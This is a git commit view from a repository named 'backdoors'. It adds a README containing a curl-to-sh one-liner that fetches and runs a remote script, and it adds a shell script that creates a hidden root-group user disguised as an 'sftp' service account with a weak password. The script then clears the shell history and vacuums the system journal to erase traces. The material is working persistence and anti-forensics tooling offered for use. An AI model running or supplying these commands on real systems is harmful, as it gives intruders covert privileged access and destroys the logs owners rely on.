first one yay!
This commit is contained in:
hornet
parent
b8b25d5869
commit
38b0e3e339
2 changed files with 21 additions and 1 deletions
10
README.md
10
README.md
|
|
@ -1,3 +1,11 @@
|
||||||
# backdoors
|
# backdoors
|
||||||
|
|
||||||
a collection of backdoor scripts i found/wrote myself
|
a collection of backdoor scripts i found/wrote myself
|
||||||
|
more sophisticated stuff coming in future, for now it's just a skiddie's trash bin
|
||||||
|
|
||||||
|
## one-liners
|
||||||
|
|
||||||
|
### service user backdoor:
|
||||||
|
```
|
||||||
|
curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
|
||||||
|
```
|
||||||
12
service_user.sh
Executable file
12
service_user.sh
Executable file
|
|
@ -0,0 +1,12 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#extremely simple backdoor, expected to work on systemd/redhat-distros, can be found with a simple look into /etc/passwd file
|
||||||
|
#change these to anything you want, to be "disguised" as a service user
|
||||||
|
USER="sftp"
|
||||||
|
GROUP="sftp"
|
||||||
|
PASSWORD="1337"
|
||||||
|
useradd -g $GROUP -G wheel,root $USER
|
||||||
|
echo $PASSWORD | passwd --stdin $USER
|
||||||
|
echo "done!"
|
||||||
|
history -c
|
||||||
|
journalctl --rotate
|
||||||
|
journalctl --vacuum-size=1B
|
||||||
Loading…
Add table
Reference in a new issue